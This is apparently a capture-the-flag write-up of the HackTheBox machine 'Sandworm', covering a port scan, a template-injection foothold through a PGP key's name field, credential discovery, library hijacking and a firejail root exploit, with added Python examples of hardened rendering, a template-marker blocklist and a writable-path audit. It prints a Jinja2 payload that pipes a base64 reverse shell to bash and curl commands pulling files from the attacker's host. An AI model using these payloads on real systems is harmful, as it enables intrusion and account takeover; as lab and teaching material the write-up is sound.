Sandworm
https://app.hackthebox.com/machines/Sandworm
from hackthebox

Port scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/http syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/emailAddress=atlas@ssa.htb/organizationalUnitName=SSA/localityName=Classified
| Issuer: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA/emailAddress=atlas@ssa.htb/organizationalUnitName=SSA/localityName=Classified
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-04T18:03:25
| Not valid after: 2050-09-19T18:03:25
| MD5: b8b7:487e:f3e2:14a4:999e:f842:0141:59a1
| SHA-1: 80d9:2367:8d7b:43b2:526d:5d61:00bd:66e9:48dd:c223
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Secret Spy Agency | Secret Security Service
8000/tcp open http-alt? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There were no interesting directories to investigate further.
Foothold
After further enumeration, the most promising page to attack was /guide. Here we can verify a PGP signature against our public key.

Now we create our own public key and a signed message to verify here.
Finding web vuln
After we create our signature and public key, let's check it out on the website.

We can see that our name is echoed back. Perhaps an SSTI vulnerability.
We need to manipulate the name field, so let's edit our key.
Exploitation
Enter the following command:
gpg --edit-key 6941D2162010EED2C <--REDACTED--> # YOUR KEY
To select the uid, enter the number listed next to it. A * will appear once it's selected.
Creating payload:

The blue line denotes the command, the yellow denotes the payload.
Create a signed message:
gpg --clearsign --output signature.asc --local-user <your key> message.txt
Export the public key:
gpg --export --armor <your key> > heapbytes.pub
SSTI
We can confirm that SSTI is exploitable here.

Repeat the steps with your own payload.
The one I used was:
# create reverse shell payload from https://revshells.com
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo " <replace your base64 encoded rev shell payload>" | base64 -d | bash').read() }}

And we got the shell
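To show why the name field is exploitable and what the fix looks like, here is an added Python example (my code, not the box's or the author's) using Jinja2 directly in place of Flask's render_template_string; it assumes Jinja2 is installed and treats the signer UID pulled from the uploaded key as untrusted input.

```python
"""Vulnerable vs. hardened rendering of a PGP signer name (added example)."""
# Assumption: Jinja2 is installed (pip install jinja2); it is the engine the
# payload on this page abuses via self.__init__.__globals__.
from jinja2 import Environment

env = Environment(autoescape=True)


def render_vulnerable(signer_uid: str) -> str:
    """The bug: the untrusted UID is spliced into the template SOURCE, so any
    {{ }} / {% %} inside it is parsed and evaluated by the engine."""
    template_src = "Signature verified. Signed by " + signer_uid
    return env.from_string(template_src).render()


def render_hardened(signer_uid: str) -> str:
    """The fix: the template source is a constant; the UID is passed as context
    data, so it is only ever printed (and HTML-escaped), never interpreted."""
    template_src = "Signature verified. Signed by {{ signer }}"
    return env.from_string(template_src).render(signer=signer_uid)


# Cheap pre-render check useful for logging/alerting on probe attempts.
# It is NOT a substitute for render_hardened: blocklists are bypassable.
TEMPLATE_MARKERS = ("{{", "{%", "{#", "${", "__globals__", "__import__")


def suspicious_signer(signer_uid: str) -> bool:
    """True if the UID carries template syntax or dunder lookups."""
    return any(marker in signer_uid for marker in TEMPLATE_MARKERS)


if __name__ == "__main__":
    probe = "{{ 7*7 }} <x@example.com>"  # constructed UID, classic SSTI probe
    print("vulnerable:", render_vulnerable(probe))  # ... Signed by 49 <x@example.com>
    print("hardened:  ", render_hardened(probe))    # ... Signed by {{ 7*7 }} &lt;x@example.com&gt;
    print("flagged:   ", suspicious_signer(probe))  # True
```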
User shell
After a while, I found an interesting file containing the user's password.
~/.config/httpie/sessions/localhost_5000/admin.json
SSH with the creds

DONE
Privilege Escalation (2)

Source code of the running application

It's using a logger library, and fortunately we have write access to that library.
Path of the logger library:

Let's edit the library code.

Wait a few minutes (less than 2 minutes) to get the shell.
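The weakness behind this step is a module writable by a low-privileged user being imported by a job that runs as someone else. As an added defensive check (my code, not the author's or the box's), this stdlib-only script lists import directories, and the .py files directly inside them, that are group- or world-writable; the layout built by demo() is constructed for illustration.

```python
"""Audit import locations for permissions that allow module hijacking (added example)."""
import os
import shutil
import stat
import sys
import tempfile
from typing import Dict, List


def risky_import_paths(paths: List[str]) -> Dict[str, str]:
    """Return {path: reason} for each directory in `paths`, and each .py file
    directly inside it, whose mode lets group or others write to it.
    Symlinks are skipped; the target is judged where it really lives."""
    findings: Dict[str, str] = {}
    for entry in paths:
        if not os.path.isdir(entry):
            continue  # '' (cwd) and zip/egg entries are out of scope here
        candidates = [entry] + [
            os.path.join(entry, name)
            for name in sorted(os.listdir(entry))
            if name.endswith(".py")
        ]
        for path in candidates:
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue
            if mode & stat.S_IWOTH:
                findings[path] = "world-writable"
            elif mode & stat.S_IWGRP:
                findings[path] = "group-writable"
    return findings


def demo() -> Dict[str, str]:
    """Constructed layout: one sane package dir and one with a loose logger.py."""
    base = tempfile.mkdtemp(prefix="libaudit_")
    good, bad = os.path.join(base, "good_pkg"), os.path.join(base, "bad_pkg")
    for pkg in (good, bad):
        os.mkdir(pkg)
        with open(os.path.join(pkg, "logger.py"), "w") as fh:
            fh.write("def log(msg):\n    print(msg)\n")
    os.chmod(good, 0o755)
    os.chmod(os.path.join(good, "logger.py"), 0o644)
    os.chmod(bad, 0o777)                             # anyone can drop a module here
    os.chmod(os.path.join(bad, "logger.py"), 0o666)  # anyone can edit the module
    findings = {os.path.relpath(p, base): r for p, r in risky_import_paths([good, bad]).items()}
    shutil.rmtree(base)
    return findings


if __name__ == "__main__":
    for path, reason in risky_import_paths(sys.path).items():
        print(f"{reason}: {path}")
```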
Privilege Escalation (root)

We are going to use this script to get root
https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25
We can add our ssh keys to the remote machine for a better shell experience. Create your own key with:
ssh-keygen -t rsa -b 4096 -C "your_mail@domain"
Copy ~/.ssh/id_rsa.pub into the remote machine under ~/.ssh/.
I used curl to download the file since vim was not working properly (maybe stabilize the shell and resume).
curl <your-ip>/id_rsa.pub >> ~/.ssh/authorized_keys # append the fetched key; curl does not take an output path as a bare second argument
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
Boom, now we just need to ssh in and run the script. I used curl again to copy the script from my local machine to the remote machine.

Run the firejail --join=<id> command as prompted in another ssh shell. Now run su - (or su) for the root shell.

__________heapbyte's still pwning.